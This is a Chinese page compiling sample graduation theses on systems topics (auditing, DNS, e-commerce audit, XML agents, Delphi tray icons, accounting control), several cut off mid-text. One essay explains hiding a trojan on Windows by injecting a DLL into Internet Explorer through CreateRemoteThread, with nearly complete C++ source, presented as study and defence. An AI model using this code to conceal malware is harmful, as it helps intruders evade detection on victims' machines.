系统毕业论文范文10篇

时间:2023-03-22 17:56:14

系统毕业论文

系统毕业论文范文篇1

一、审计系统必须适应环境的发展

审计系统是在一定的经济社会环境下产生,又在特定的外界环境中存在和发展。它是环境的产物,必须和环境相适应。与生态系统中的生物一样,审计系统的生存、生长受制于环境,但审计系统的存在和发展又反过来影响和改变环境。回顾审计系统的发展历程,经历了三个阶段:

第一阶段是19世纪中叶,在资本主义得到充分发展、取得工业革命成功的英国出现了现代意义的审计(称英国式审计或详细审计)。当时的审计对象是会计账簿,审计的目的是查错防弊,所使用的审计工具是详细检查,审计信息的使用人是股东。第二阶段是本世纪初,在资本主义发达的美国出现了以资产负债表为对象的资产负债表审计,其目的是判断借款人的信用状况,审计信息使用人从股东扩大到债权人(主要是银行)。第三阶段是本世纪20—30年代,由于资本市场证券化,在美国出现了以损益表为中心的财务会计报表审计,目的是提出客观公正的审计意见,审计信息使用人是所有的企业利害关系人,对上市公司而言就是社会公众。到了40年代以后,由于跨国公司的出现,国际间资本流动频繁,在发达的资本主义国家出现了国际化的会计公司。

从上述审计系统从一个阶段向高一阶段的进化过程分析,我们可以得出两点结论:一是审计系统每一次进化都是为了适应环境的变化,和任何系统一样,只有适应环境的系统才能得以生存和发展。19世纪西方资本主义得到充分发展,实行所有权和经营权分离,就出现了英国式的详细审计。到了20世纪中叶,随着企业大型化和证券化,经济活动剧增,审计师不可能对每笔交易都进行检查,审计系统就由详细审计进化到抽样审计。有了跨国公司,就有了国际性的会计事务所。正是审计系统适应了所生存的环境,才使得本身得到充分的发展。同时,进化后的审计系统又反作用于环境,对社会经济起了积极推动作用,成为人类经济系统中不可缺少的一个子系统。二是审计系统的每一次进化都有赖于相应的理论、方法和技术的支持。从英国式的详细审计进化到资产负债表审计,是因为有内部牵制理论和统计抽样技术的支持。同样,从资产负债表审计进化到财务会计报表审计,是因为有内部控制理论和审计风险测试评价技术的支持。这是审计系统一次具有非常意义的“进化”,正是由于审计系统普遍采用了统计抽样技术和内部控制测试技术,从而使审计系统的功能大大增强,在大大提高了审计效率的同时,又有效地控制了审计风险。

同理,在步入21世纪的今天,审计系统又面临着新环境的挑战。新经济和数字时代的到来,以及经济全球化、市场一体化等将对审计系统产生重大影响。面对新经济环境的挑战,审计系统必须适应这种环境的进化,而要进化就必须有相应的理论和技术方法即系统科学和信息技术的支持,笔者将由系统科学和计算机技术支持下进化了的审计称为系统审计,与之相对应的是传统的详细审计和内控审计。下图表达了审计系统的进化过程。

需要说明的是,“系统审计”与“审计系统”是二个既有联系又有区别的概念。系统审计是指在系统科学和信息技术支持下的审计理论方法,表明一种审计理念,是相对于其它审计方法而言的。审计系统则是泛指审计体系,详细审计、财务会计报表审计、系统审计都是审计系统各个不同历史时期的产物。

二、系统审计和传统审计的比较

传统审计的思维方式是:部分→整体。传统审计总是先分析对象的各个部分,然后再综合为整体。这种思维方法的局限性在于把分析与综合、部分与整体、原因与结果机械地割裂开来,认为部分是原因,整体是结果,部分决定整体。传统审计方法着眼于一个个要素,进而得出整体的性能,其逻辑结论往往是组成整体的要素好,整体的性能也就好。不论是一百五十年前的详细审计,还是目前的财务会计报表审计,注册会计师的思想方法都是从部分去推测整体,而系统审计的思想方法则是从整体到部分。详细审计是从每一笔交易→账户→再到报表;财务会计报表审计是通过对内部控制和控制风险的研究→抽取部分交易为样本→账户→最终证实报表信息的真实和公允性。详细审计和报表审计在研究审计对象经济活动时,只把各组成部分孤立地、简单地加起来,这并不能说明审计对象经济活动的整体性质和功能。因为各要素的简单相加,并不能构成一个系统。

系统审计思维方法则不同于传统审计,它的思维方式是:整体→部分。系统审计从整体出发,先进行系统综合,形成可能的系统方案,再进行系统分析。分析系统各要素及其相互关系,建立模型,然后进行系统选择,实现最优化,重新综合成整体。系统审计方法的程序是:综合→分析→综合。它不仅着眼于个别要素的优劣,而且利用了要素之间的相互关系,观察和判断系统整体的性能。要素和系统不是一种简单的线性因果关系,系统的整体性能不单是取决于组成系统的要素,而且还有要素之间的相互作用。系统审计方法正是在要素之间相互作用的关系中进行分析和综合,才能正确地认识审计对象的整体性能。系统审计把审计对象的经济活动当作一个整体来研究。这一整体的性质和规律,只存在于组成要素的相互联系、相互作用之中。各个组成部分孤立的特征或者活动的总和,并不能反映整体的特征和活动。系统审计强调系统的整体性,要求注册会计师不能象以前那样,先把审计对象分成几个部分,然后再汇集起来。而是把审计对象作为一个有机的整体来对待,先看整体,再看部分;先看全局,再看局部;先看宏观,再看微观;先看全过程,再看某一个阶段。从整体与环境、整体与部分的相互依赖、相互制约中,去揭示系统的特征和运动规律。对局部的研究必须放在整体中,从整体的各个部分的联系、制约中去加以研究。当然,注册会计师研究审计对象经济活动整体,并不是不深入具体细节去考察分析,一个正确地认识来自于从整体到部分,部分到整体的反复过程。系统审计在研究问题时,把任何对象都看成是系统,然后着眼于系统和环境之间、系统和要素之间的相互关系,确定要素的层次结构,这样就便于用数学方法从定性和定量的结合上研究、描述现实系统。系统审计比传统审计方法更能将分析和综合、归纳和演绎等方法有机地结合起来,因而为运用数理逻辑方法和计算机技术开辟广阔的道路。

系统毕业论文范文篇2

关键词:域名地址服务器

当前,在经济全球化和全球信息化大潮中,人们不仅重视信息及其集成的作用,而且更加重视信息使用者对信息集成的反应和运用。互联网上的域名已为越来越多的人们所关注,因此,了解域名及其对应的IP地址的关系,正确地配置域名服务器,就成为设立网站、使自己在Internet上注册的域名得到体现的关键。

1.IP地址

IP(InternetProtocol)地址就是网络协议地址,是分配给网络节点的逻辑地址。这些网络节点可以是网络中的任何一台主机,提供节点之间的交换信息服务。由于在Internet网络中存在着大量的节点,为了能够在网上找到这个节点,就必须给予标识。IP地址就是一种标识方法,它独立于任何特定的网络硬件和网络配置,使用TCP/IP协议的网络在发送或接收信息时先把数据打包,然后将目标IP地址翻译成MAC(Medi-umAccessControl)硬件的物理地址,这样就可以把数据包准确地发送或接收过来。

每个IP地址是由4个字节共32位组成,每字节之间使用小数点分隔,一般用十进制数字表示。每个IP地址包括两个标识(ID),即网络ID和宿主机ID,同一个物理网络上的所有主机都用同一个网络ID,而网络上的每个服务器、路由器、计算机等都有一个主机ID。比如202.98.180.194即是云南省科学技术情报研究所的一个WWW服务器的IP地址。

2.因特网域名及结构

由于IP地址全是数字代码,既不直观又难于记忆,因特网在IP地址的基础上,提供了一种面向用户的主机名字,即域名。如istiy(InstituteofScientific&TechnicalInformationofYunnan)为我所(云南省科学技术情报研究所)的英文缩写。即为我所在因特网上注册的域名,而(主机名+域名)为我所DNS服务器的主机域名,对应的IP地址就是202.98.180.193。

3.域名解析系统DNS(DomainNameSystem)就是提供域名与IP地址相互映射的网络服务。事实上,DNS是遍布于全世界的一个分布式数据库。它主要负责控制整个数据库中的部分段,每一段中的数据通过客户/服务模式在整个网络上均可存取。DNS的数据库结构,同UNIX文件系统(或MSDOS文件系统)的结构很相似,整个数据库(或文件系统)将根放在顶端,画出来就像一颗倒转的树。在DNS中,根的名字以空字符串“”表示,DNS简单地称其为“根”(Root)或偶而称之为“根域”(RootDomain),在UNIX文件系统中,根以反斜杠“/”表示,被称为“根目录”。如图1所示.

图1在DNS和UNIX文件系统中名称的读法

DNS数据库“”

cn

系统毕业论文范文篇3

一、电子商务系统审计的必然性和必要性

在商业活动实现网络化之前,采购是面对面或通过纸质文件进行的,有迹可查,即使是电子交易,其设备结构是专用的,一般只限于已知用户使用,任何外部用户必须是已知的、身份明确的、可追踪的;系统通常是主机结构方式,相对易于监督、控制和审计。与传统商业相比,万维网客户/服务器系统的特点是高度分散,资源共享、服务分散、顾客透明度高等,而电子商务的运作速度更快、业务循环周期更短、风险更大、更高程度地依赖于技术。电子商务系统的技术基础和市场的快速变化意味着传统的衡量方法已不再适用于企业的某些资产,财务报告不能充分提供企业的状况和价值方面的信息,特别是网络企业的无形资产,如商誉、客户忠诚度和满意程度等这些产生长期价值的关键资产。核实确认这类资产价值的困难在于缺乏足够的历史数据、合适的参照标准、先进的实践经验以及对网络的各种威胁和概率的准确估算。企业管理层以及公众都需要寻找能够用以表述网络企业的可信度、安全性及其他资产价值的方法,需要一些新的核查和审计方法,更有效地评价无形资产,如知识、品牌等。因此,电子商务系统审计就成为历史的必然。由于,电子商务的可靠性、适用性、安全性和性能等方面受到的威胁或存在的风险,都可能会影响其生存和发展。风险因素包括:商业信息的泄露、智能财产的不当使用、对版权的侵犯、对商标的侵犯、网络谣言和对信誉的损害等。因此,进行必要和客观的审计,才会使董事会、审计委员会、高级管理层对电子商务系统的安全运作和效益满意和放心。

二、网络风险和风险管理

网络风险如同自然灾害一样不可预见。风险管理的关键在于风险评估,风险评估就是要分析和衡量风险事件发生的概率及后果,引起风险的因素及其关联因素,出现风险的关键点采取什么方法能够减缓风险,风险出现造成后果如何,以及评价管理层是否履行了应有的职业审慎进行防范和控制。同时在评估中还要为各项因素设计评价比率,计算各种风险的影响后果,根据影响和后果排序,对高风险因素作进一步的分析。

通过风险评估,可以认识到潜在风险(威胁)及其影响,以便对高风险领域作一些防范、检测、控制、减缓和恢复的工作计划和安排。这些计划和安排应涵盖对各项控制成本,主要是指接受、避免、转移、监测成本的分析以及各项工作的先后次序。

三、电子商务系统审计中网站的合法性证明

网络终端用户都会关注网站是否来自一个真实的、可靠的机构,提供的信息是否准确真实,机构背景是否正当合法,个人信息的隐私权是否得到保护等。所谓隐私权是指对个人的数据/信息的搜集必须合法、公平,必须用于某一特定、公开的目的,必须取得该个人的同意并受到保护,本人必须有权进入系统进行修改或删除,信息的越域流动和将来的使用、披露必须予以安全保证和限制等。

解决这些网站合法性问题的途径之一就是由一公证机构提供可靠的证明,以使网络终端用户能对网站提供的电子商务放心。如Verisign,TRUSTe,BBBOnline,WebTrust,SysTurst等都是具有良好的信誉并且提供证明-查证服务的专业组织机构。网络终端用户可以通过查询这些公证机构的记录,获得确认被访问网站的名称、有效状态、服务器标识等信息。

四、内部审计和电子商务系统审计

美国注册会计师协会对“核实查证”的定义是“提高决策者所需要信息的质量或内容的独立性专业服务。”其审计原则是保证系统的可用性、安全性、真实完整性和持续性,建议对系统安全性和真实完整性方面存在的控制点进行检查、评价和测试。并尽量在今后采用合适的审计标准对信息技术进行审计。不同于以年度为基础的传统外部审计,电子商务的实时性要求审计人员应对其进行连续不断的评估,按特定的审核标准对已发生的交易进行追踪,而系统内设置的自动登录记录可作为相应的审计轨迹,在系统内部实施对事件监督和控制。

尽管当前许多人认为核实查证通常与外部审计人员相关,内部审计人员则在公司内部出具审计报告。然而,国际内部审计师协会对电子商务系统审计的要求则是:审计控制目标主要是审计财务报告制度、经营的效益和效率、合规性和保护财产安全等方面。审计模式应该建立在系统的可用性、容量、功能、保护和可靠性的基础上。例如,内部审计对网络企业控制水平的独立评价,使得客户了解到企业提供的数据将不会被有意或无意地滥用。再如,企业目标是建立电子商务以降低成本、提高市场占有率,那么电子商务风险是随着网络交易的增加而增加,以至于不能确保交易的安全性或分辨用户的可靠性,因此,所需要的控制就是对用户的真实性进行确认以及对通讯信息进行加密。

电子商务系统审计的成功与否在于审计人员是否掌握相关的技术知识,了解商业风险及风险管理策略,是否有现成的策略随时应付出现的风险。因此,作为一个成功内部审计人员应了解企业的业务,以服务为宗旨并努力增值,积极提高专业技能,关注系统的效率和效益,建立对电脑领域发展的职业敏感性。

系统毕业论文范文篇4

关键词AgentXMLJava

近年来,人们对多Agent系统的研究正越来越深入,已开始利用多Agent系统构建智能搜索引擎和灵活的电子商务系统。其中,如何有效地提高Agent间的协作和通信是系统的一个难点。

1Agent理论

和GUI技术一样,Agent技术的应用将会十分普遍,如今它正日益引起人们的研究兴趣。简单地讲,Agent可被看成是运行在计算机上的一个软件程序。它具有以下几方面的特征:

?Agent是一类自治实体。

一个自治实体的计算机程序是指它能依据自己的规则运行,并能初始化自身的操作。

?Agent具有通信的能力。

Agent之间应能互相通信,发送信息。

?Agent具有目标和意图。

Agent具有一定的功能。因此,它具有实现的目标,在这个意义上,它具有实现其目标的意图。

?Agent具有知识。

Agent为了实现目标,它必须具备实现自身目标的一些知识。

?Agent具有智能。

Agent具有一定的智能,能自主地适应环境的变化,通过学习来提高自身能力。

2XMLAgent

XML以其良好的数据存储格式、可扩展性、高度结构化、便于网络传输等特点,已经被业界倡导作为电子商务的通用描述语言。XML提供了丰富的语法来存储数据、携带数据和交换数据,能方便地在独立的平台之间交换数据和针对特定的应用定义自己的标记语言。

在Java2平台里,增加了处理XML文档的API函数—CommonDOMAPI和SimpleAPIForXMLParsing(SAX)等,它符合W3C提供的文档对象模型(DOM—DocumentObjectModel)等接口规范。

因为Java的安全性和可移植性,Java简化了Agent的开发,Java字节码能够在任何具有Java虚拟机的硬件环境和操作系统平台上运行。

Agent采用Java实现并且包含XML对象因此称为XMLagent。它具有以下特征:智能性,通用、简单的数据交换等。XMLAgent将逻辑和数据封装在一起,在网络间移动,能在具有Java运行环境的目的节点直接处理。

3分布式多Agent系统的结构

根据其是否移动,XMLAgent可简单地分为:移动XMLAgent,固定XMLAgent(本地和远程)。Java包包含很多类,我们可以对其进行扩展增加Agent通信时的智能性。

在分布式系统中,应用程序分布于网络的不同计算机上。当Agent移动到目的节点时,它会携带自身的程序、数据和状态一起移动,这是与CORBA、DCOM等分布式计算解决方案的主要区别。CORBA和DCOM提供了分布式对象相互通信的方法标准,规定了组件和应用程序如何建立在一个分布的有组织的体系结构里,依据其标准能构建复杂的分布对象应用。将这些标准与XMLAgent结合起来,在具体的开发中将十分有用。

3.1系统的描述

在多Agent系统中,我们采用FIPAACL通信语言。为了实现Agent间的协作,我们使用XML来对Agent请求、提供的服务进行描述。分布式多Agent系统的结构如图1所示:

图1分布式多Agent系统的结构

用户通过接口Agent能够进行注册,给出反馈,查看信息,创建Agent,查看结果以及系统的状态、性能等。通过调度Agent通过AgentServer选择合适的Agent执行服务请求。DBAgent能够从数据库中接收具体的控制信息。

固定Agent(DBAgent)管理各数据库的状态,当需要时就调用它们。固定Agent接收和转换来自于移动Agent的请求。我们可以认为固定Agent涉及各数据库的本地字典,而移动Agent涉及到了全局字典。这样,固定Agent通过接收、执行移动Agent传送过来的请求最终完成应用程序之间的协作。移动Agent从一个节点移动到另一个节点,通过与固定Agent交换信息(发送和接收XML信息),实现服务请求。固定Agent和移动Agent都是用包含XML对象的Java实现的,即所谓的XMLAgent。

3.2通信框架

在多Agent系统中,Agent间的通信采用ACL通信语言。我们使用多层的ACL通信语言:一个外部的“Agent交互协议”AIP层和一个内部的内容体层。AIP层提供了一个可扩展的原语集,它能控制Agent间的基本交互。另外,原语集并非闭集,实际应用中设计者能对其进行扩展以满足通信的能力。为了实现目标,我们可使用如下原语,如表1所示:

Requiredperformatives:RequestReplyError

Additionalperformatives:InformFailureUnderstand

表1原语

AIP描述Agent的交互过程,如信息的交换过程,它允许通过不同的系统组件解决问题。每个AIP组件既能进行全局处理也能进行局部处理。移动Agent检索可用的应用程序来执行服务,当初始服务失败时,它应能提供必要的反馈结果。它携带自身的程序,数据与本地的应用程序通信。而本地处理的过程是由固定Agent以分布的方式实现的。因此,全局问题的解决过程和本地问题的解决过程是可以相互独立修改的。

在应用中,我们首先根据需要使用DTD(文档类型定义)定义Agent通信信息的XML文档模板,然后将具体的XML文档嵌入到FIPA-ACL框架的内容体中,ACL可被称为XML-ACL。

由于XML描述数据和元数据的能力,Agent能够十分容易地理解基于XML的描述信息。FIPAXML-ACL格式请求信息的例子如下:

(request

:senderMobileAgent

:receiverStaticAgent

:languageXML

:interaction-protocolagent-request

:ontologyagent-management-ontology

:content<?xmlversion=”1.0”>

<action>register</action>

<actor>StaticAgent</actor>

<args>null</args>

<protocol>Request-inform</protocol>

<reply-with>Hello!</reply-with>

<ontology>default</ontology>

)

CORBA,DCOM等标准和方法都是为了解决分布对象应用问题的,能确保应用程序交换数据并能跨平台的远程调用。

把这些标准和XMLAgent技术结合起来,将极大地提高系统的可扩展性和智能性。

4结论

随着分布式应用程序的增多和Agent技术的兴起,人们研究的难点大多集中于应用程序的交互和Agent间的协作上,我们探讨了XML在多Agent系统中的应用,为解决此问题提供了新的思路。

5参考文献

[1]FIPA.FIPAInteractionProtocolLibrarySpecification./specs/fipa00025/XC00025D.html[J/OL],2001

[2]殷兆麟等.Java网络编程[M].国防工业出版社,2001

[3]FIPA.FIPAACLMessageStructureSpecification./specs/fipa00061/[J/OL],2001

[4]DistributedCommonObjectModel

系统毕业论文范文篇5

在Shell32.DLL动态链接库中包括一个函数Shell_NotifyIconA()可通知Windows在任务条右下角加入一个小图标,可惜该函数的详细说明未收入Delphi的帮助文档中。现将实现例程示范如下:

unitpro2;

interface

uses

。。。,Menus,shellAPI;//TNotifyIconData是定义在shellAPI单元的

{自定义消息,当小图标捕捉到鼠标事件时Windows向回调函数发送此消息}

constWM_MYTRAYICONCALLBACK=WM_USER+1000;

。。。。

private

MyTrayIcon:TNotifyIconData;

procedureWMMyTrayIconCallBack(VarMsg:TMessage);messageWM_MYTRAYICONCALLBACK;

//托盘消息处理过程

procedureWMCommand(Varmsg:TWMCommand);messageWM_Command;

//处理托盘图标的右键菜单事件

procedureMinimize(varmess:TWMNCLBUTTONDOWN);messageWM_NCLBUTTONDOWN;

//窗体最小化时的消息处理

。。。。。。。。

procedureTForm1.FormCreate(Sender:TObject);

begin

//将程序窗口样式设为TOOL窗口,避免在任务栏上出现

SetWindowLong(Application.Handle,GWL_EXSTYLE,WS_EX_TOOLWINDOW);

end;

procedureTForm1.FormShow(Sender:TObject);

begin

//设置托盘

Icon.Handle:=LoadIcon(Hinstance,''''MAINICON'''');

MyTrayIcon.cbSize:=SizeOf(TNotifyIconData);//nid变量的字节数

MyTrayIcon.Wnd:=Handle;//主窗口句柄

MyTrayIcon.uID:=1;//内部标识,可设为任意数

MyTrayIcon.uFlags:=NIF_ICONorNIF_TIPorNIF_MESSAGE;//指明哪些字段有效

MyTrayIcon.uCallBackMessage:=WM_MYTRAYICONCALLBACK;//回调函数消息,将自定义托盘消息传递进去

MyTrayIcon.hIcon:=Application.Icon.Handle;//要加入的图标句柄,可任意指定

StrCopy(MyTrayIcon.szTip,PChar(Caption));

Shell_NotifyIcon(NIM_ADD,@MyTrayIcon);

ShowWindow(Handle,sw_Hide);

//Visible:=False;//当程序启动时就最小化在托盘区即Form.Create时启用此语句

Application.ShowMainForm:=False;

SetForegroundWindow(Application.Handle);

end;

////消息过程实现

procedureTForm1.WMMyTrayIconCallBack(varMsg:TMessage);

varCursorPos:TPoint;

begin

caseMsg.LParamof

WM_LBUTTONDBLCLK://双击消息:弹出主窗口

begin

Visible:=notVisible;

Application.ShowMainForm:=Visible;

SetForegroundWindow(Application.Handle);

end;

WM_RBUTTONDOWN://鼠标右键:弹出菜单

begin

GetCursorPos(CursorPos);

{Popupmenu1.Popup(CursorPos.X,CursorPos.Y);

popupmen1里面就可以加入显示主窗口、退出等功能。这个右键菜单可以是静态的,如上面一句来弹出;也可以动态建立,如下面所示的方法:}

pm:=createpopupmenu;//建立一个Hmenu,pm:hmenu;

AppendMenu(pm,0,ord(''''A''''),''''关于....'''');//在指定的菜单里添加一个菜单项

AppendMenu(pm,0,Ord(''''B''''),''''&Exit'''');

//加入菜单事件---》处理WMCOMMAND消息即可

TrackPopupMenu(pm,Tpm_BottomAlignorTpm_RightAlign,CursorPos.x,CursorPos.y,0,handle,nil);

//在图标上方显示该弹出式菜单

end;

end;

end;

procedureTForm1.WMCommand(varmsg:TWMCommand);

begin

Casemsg.ItemIDof

Ord(''''A''''):showmessage(''''我的右键菜单!'''');

Ord(''''B''''):Self.close;//关闭程序主窗体

elseinherited;

end;

end;

procedureTform1.Minimize(varmess:TWMNCLBUTTONDOWN);//应用程序最小化消息处理

begin

ifMess.Hittest=htReducethen

Self.Hide

elseinherited;

end;

procedureTForm1.FormClose(Sender:TObject;varAction:TCloseAction);

var{程序被关闭时通知Windows去掉小图标}

nid:TNotifyIconData;

begin

nid.cbSize:=sizeof(nid);//nid变量的字节数

nid.uID:=1;//内部标识,与加入小图标时的数一致

nid.Wnd:=Handle;//主窗口句柄

系统毕业论文范文篇6

摘要进程的隐藏一直是木马程序设计者不断探求的重要技术,本文采用远程线程技术,通过动态链接库方法,较好地解决了这一问题,通过远程线程将木马作为线程隐藏在其他进程中,从而达到隐藏的目的。

关键字进程线程木马动态链接库

木马程序(也称后门程序)是能被控制的运行在远程主机上的程序,由于木马程序是运行在远程主机上,所以进程的隐藏无疑是大家关心的焦点。

本文分析了WindowsNT/2000系统下进程隐藏的基本技术和方法,并着重讨论运用线程嫁接技术如何实现WindowsNT/2000系统中进程的隐藏。

1基本原理

在WIN95/98中,只需要将进程注册为系统服务就能够从进程查看器中隐形,可是这一切在WindowsNT/2000中却完全不同,无论木马从端口、启动文件上如何巧妙地隐藏自己,始终都不能躲过WindowsNT/2000的任务管理器,WindowsNT/2000的任务管理器均能轻松显示出木马进程,难道在WindowsNT/2000下木马真的再也无法隐藏自己的进程了?我们知道,在WINDOWS系统下,可执行文件主要是Exe和Com文件,这两种文件在运行时都有一个共同点,会生成一个独立的进程,寻找特定进程是我们发现木马的方法之一,随着入侵检测软件的不断发展,关联进程和SOCKET已经成为流行的技术,假设一个木马在运行时被检测软件同时查出端口和进程,我们基本上认为这个木马的隐藏已经完全失败。在WindowsNT/2000下正常情况用户进程对于系统管理员来说都是可见的,要想做到木马的进程隐藏,有两个办法,第一是让系统管理员看不见你的进程;第二是不使用进程。本文以第二种方法为例加以讨论,其基本原理是将自已的木马以线程方式嫁接于远程进程之中,远程进程则是合法的用户程序,这样用户管理者看到的只是合法进程,而无法发现木马线程的存在,从而达到隐藏的目的。

2实现方法

为了弄清实现方法,我们必须首先了解Windows系统的另一种"可执行文件"----DLL,DLL是DynamicLinkLibrary(动态链接库)的缩写,DLL文件是Windows的基础,因为所有的API函数都是在DLL中实现的。DLL文件没有程序逻辑,是由多个功能函数构成,它并不能独立运行,一般都是由进程加载并调用的。因为DLL文件不能独立运行,所以在进程列表中并不会出现DLL,假设我们编写了一个木马DLL,并且通过别的进程来运行它,那么无论是入侵检测软件还是进程列表中,都只会出现那个进程而并不会出现木马DLL,如果那个进程是可信进程,(例如浏览器程序IEXPLORE.EXE,没人会怀疑它是木马吧?)那么我们编写的DLL作为那个进程的一部分,也将成为被信赖的一员,也就达到了隐藏的目的。

运行DLL方法有多种,但其中最隐蔽的方法是采用动态嵌入技术,动态嵌入技术指的是将自己的代码嵌入正在运行的进程中的技术。理论上来说,在Windows中的每个进程都有自己的私有内存空间,别的进程是不允许对这个私有空间进行操作的,但是实际上,我们仍然可以利用种种方法进入并操作进程的私有内存。动态嵌入技术有多种如:窗口Hook、挂接API、远程线程等,这里介绍一下远程线程技术,它只要有基本的进线程和动态链接库的知识就可以很轻松地完成动态嵌入。

远程线程技术指的是通过在另一个进程中创建远程线程的方法进入那个进程的内存地址空间。我们知道,在进程中,可以通过CreateThread函数创建线程,被创建的新线程与主线程(就是进程启动时被同时自动建立的那个线程)共享地址空间以及其他的资源。但是很少有人知道,通过CreateRemoteThread也同样可以在另一个进程内创建新线程,被创建的远程线程同样可以共享远程进程(是远程进程)的地址空间,所以,实际上,我们通过一个远程线程,进入了远程进程的内存地址空间,也就拥有了那个远程进程相当的权限。

3实施步骤

1)用Process32Next()函数找到宿主进程,获取宿主进程ID,并用

OpenProcess()函数打开宿主进程。

2)用VirtualAllocEx()函数分配远程进程地址空间中的

内存。

3)用WriteProcessMemory()函数将待隐藏的DLL的路径名。

4)拷贝到步骤二已经分配的内存中。

5)用GetProcAddress()函数获取LoadlibraryA()函数的实地址(在kernel32.dll中)。

6)用CreateRemoteThread()函数在远程进程中创建一个线程。

7)它调用正确的LoadlibraryA()函数。

8)为它传递步骤二中分配的内存地址。

4具体实例

下面是在C++Builder4.0环境下编写的运用远程线程技术隐藏木马的程序代码:

#include<vcl.h>

#include<windows.h>

#include<stdio.h>

#include<tlhelp32.h>//该头文件包涵了进程操作的API函数

#pragmahdrstop

#include"Unit1.h"

#pragmapackage(smart_init)

#pragmaresource"*.dfm"

InsistingpszLibFileName;//存放待隐藏的DLL文件名

HANDLEhProcessSnap=NULL;//进程快照句柄

HANDLEhRemoteProcess;//远程进程句柄

LPVOIDpszLibFileRemote;//远程进程中分配给文件名的空间

HMODULEphmd;//存放kernel32.dll句柄

HANDLEhRemoteThread1=NULL;//存放远程线程句柄

TForm1*Form1;

//---------------------------------------------------------

__fastcallTForm1::TForm1(TComponent*Owner)

:TForm(Owner)

{

}

//---------------------------------------------------------

void__fastcallTForm1::Button1Click(TObject*Sender

{

PROCESSENTRY32pe32={0};

DWORDdwRemoteProcessId;

hProcessSnap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);

//打开进程快照

if(hProcessSnap==(HANDLE)-1)

{

MessageBox(NULL,"CreateToolhelp32Snapshotfailed","",MB_OK);

exit(0);

}//失败返回

pe32.dwSize=sizeof(PROCESSENTRY32);

if(Process32Fi

rst(hProcessSnap,&pe32))//获取第一个进程

{

do{

AnsiStringte;

te=pe32.szExeFile;

if(te.Pos("iexplore.exe")||te.Pos("IEXPLORE.EXE"))

//找到宿主进程,以IEXPLORE.EXE为例

{dwRemoteProcessId=pe32.th32ProcessID;

break;

}

}

while(Process32Next(hProcessSnap,&pe32));//获取下一个进程

}

else

{

MessageBox(NULL,"取第一个进程失败","",MB_OK);

exit(0);

}

hRemoteProcess=OpenProcess(PROCESS_CREATE_THREAD|PROCESS_VM

_OPERATION|PROCESS_VM_WRITE,FALSE,dwRemoteProcessId);

//打开远程进程

pszLibFileName=GetCurrentDir()+"\\"+"hide.dll";

//假设hide.dll是待隐藏的进程

intcb=(1+pszLibFileName.Length())*sizeof(char);//计算dll文件名长度

pszLibFileRemote=(PWSTR)VirtualAllocEx(hRemoteProcess,NULL,cb,

MEM_COMMIT,PAGE_READWRITE);

//申请存放文件名的空间

BOOLReturnCode=WriteProcessMemory(hRemoteProcess,

pszLibFileRemote,(LPVOID)pszLibFileName.c_str(),cb,NULL);

//把dll文件名写入申请的空间

phmd=GetModuleHandle("kernel32.dll");

LPTHREAD_START_ROUTINEfnStartAddr=(LPTHREAD_START_ROUTINE)

GetProcAddress(phmd,"LoadLibraryA");

//获取动态链接库函数地址

hRemoteThread1=CreateRemoteThread(hRemoteProcess,NULL,0,

pfnStartAddr,pszLibFileRemote,0,NULL);

//创建远程线

if(hRemoteThread1!=NULL)

CloseHandle(hRemoteThread1);//关闭远程线程

if(hProcessSnap!=NULL)

CloseHandle(hProcessSnap);//关闭进程快照

}

该程序编译后命名为RmtDll.exe,运行时点击界面上的按钮即可。

至此,远程嵌入顺利完成,为了试验我们的hide.dll是不是已经正常地在远程线程运行,我同样在C++Builder4.0环境下编写并编译了下面的hide.dll作为测试:

nclude<vcl.h>

#include<windows.h>

#pragmahdrstop

#pragmaargsused

BOOLWINAPIDllEntryPoint(HINSTANCEhinst,unsignedlongreason,void*lpReserved)

{

charszProcessId[64];

switch(reason)

{

caseDLL_PROCESS_ATTACH:

{//获取当前进程ID

itoa(GetCurrentProcessId(),szProcessId,10);

MessageBox(NULL,szProcessId,"RemoteDLL",MB_OK);

break;

}

default:

}

returnTRUE;

}

当使用RmtDll.exe程序将这个hide.dll嵌入IEXPLORE.EXE进程后假设PID=1208),该测试DLL弹出了1208字样的确认框,同时使用PS工具

也能看到:

ProcessID:1208

C:\WINNT\IEXPLORE.EXE(0x00400000)

……

C:\WINNT\hide.dll(0x100000000)

……

这证明hide.dll已经在IEXPLORE.EXE进程内正确地运行了。上面程序的头文件由编译器自动生成,未作改动,故略之。

5结束语

进程隐藏技术和方法有很多,而且这一技术发展也相当快,本文仅从一个侧面加以讨论,希望通过这一探讨让我们对进程隐藏技术有一个更清楚的认识,同时也为我们防范他人利用进程隐藏手段非法入侵提供参考,本文抛砖引玉,不当之处诚恳批评指正。

参考文献

系统毕业论文范文篇7

内部控制关系到企业财产物资的安全完整、关系到会计系统对企业经济活动反映的正确性和可靠性。企业为实现既定的管理目标,必需建立起了一整套内部控制制度,以保证企业有序、健康地发展。企业在建立了电算化会计系统后,企业会计核算和会计管理的环境发生了很大的变化。由于使用了计算机,会计数据处理的速度加快了,会计核算的准确性和可靠性得到了极大的提高,减少了因疏忽大意及计算失误造成的差错。但是,也为企业的内部控制带来了许多前所未有的新问题,对企业内部控制制度造成了极大的冲击,使企业内部控制制度在新的环境下显得落后于形势了,由于电算化会计系统的特殊性,建立一整套适合电算化会计系统的内部控制制度就显得尤为重要。

电算化会计系统对内部控制的特殊要求主要体现在以下几方面:

1.计算机的使用改变了企业会计核算的环境

企业使用计算机处理会计和财务数据后,企业的会计核算的环境发生了很大的变化,会计部门的组成人员从原来由财务、会计专业人员组成,转变为由财务、会计专业人员和计算机数据处理系统的管理人员及计算机专家组成。会计部门不仅利用计算机完成基本的会计业务,还能利用计算机完成各种原先没有的或由其他部门完成的更为复杂的业务活动,如销售预测、人力资源规划等。随着远程通讯技术的发展,会计信息的网上实时处理成为可能,业务事项可以在远离企业的某个终端机上瞬间完成数据处理工作,原先应由会计人员处理的有关业务事项,现在可能由其他业务人员在终端机上一次完成;原先应由几个部门按预定的步骤完成的业务事项,现在可能集中在一个部门甚至一个人完成。因此,要保证企业财产物资的安全完整、保证会计系统对企业经济活动反映的正确和可靠、达到企业管理的目标,企业内部控制制度的建立和完善就显得更为重要,内部控制制度的范围和控制程序较之手工会计系统更加广泛,更加复杂。

2.电算化会计系统改变了会计凭证的形式

